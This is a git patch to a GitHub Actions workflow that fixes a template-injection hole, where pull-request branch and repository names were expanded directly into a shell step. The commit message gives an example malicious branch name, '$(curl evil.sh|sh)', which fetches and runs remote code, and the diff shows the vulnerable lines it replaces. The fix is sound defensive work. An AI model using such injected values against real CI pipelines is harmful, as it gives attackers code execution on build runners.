From 6b2100e435f1339b19adec02aa5b1e55472de58e Mon Sep 17 00:00:00 2001
From: Jan Nedbal <jan.nedbal@shipmonk.com>
Date: Fri, 29 May 2026 14:53:39 +0200
Subject: [PATCH] Fix template injection in E2E workflow

The "Update Dead Code Detector" step expanded ${{ github.head_ref }} and
${{ github.event.pull_request.head.repo.full_name }} directly into the
shell script. Both are attacker-controlled on fork PRs, so a branch name
like $(curl evil.sh|sh) would be executed on the runner.

Pass them via env vars and reference them as quoted shell variables so
their values can no longer break out of the string context.

Flagged by zizmor (template-injection, High).

Co-Authored-By: Claude Code
---
 .github/workflows/e2e.yml | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/.github/workflows/e2e.yml b/.github/workflows/e2e.yml
index 8c27f74..f5bdb95 100644
--- a/.github/workflows/e2e.yml
+++ b/.github/workflows/e2e.yml
@@ -54,9 +54,12 @@ jobs:
 
             -
                 name: Update Dead Code Detector
+                env:
+                    HEAD_REPO: ${{ github.event.pull_request.head.repo.full_name }}
+                    HEAD_REF: ${{ github.head_ref }}
                 run: |
-                    composer config repositories.pr vcs https://github.com/${{ github.event.pull_request.head.repo.full_name }}
-                    composer require --dev shipmonk/dead-code-detector:dev-${{ github.head_ref }} --with-all-dependencies --minimal-changes
+                    composer config repositories.pr vcs "https://github.com/$HEAD_REPO"
+                    composer require --dev "shipmonk/dead-code-detector:dev-$HEAD_REF" --with-all-dependencies --minimal-changes
 
             -
                 name: Run analysis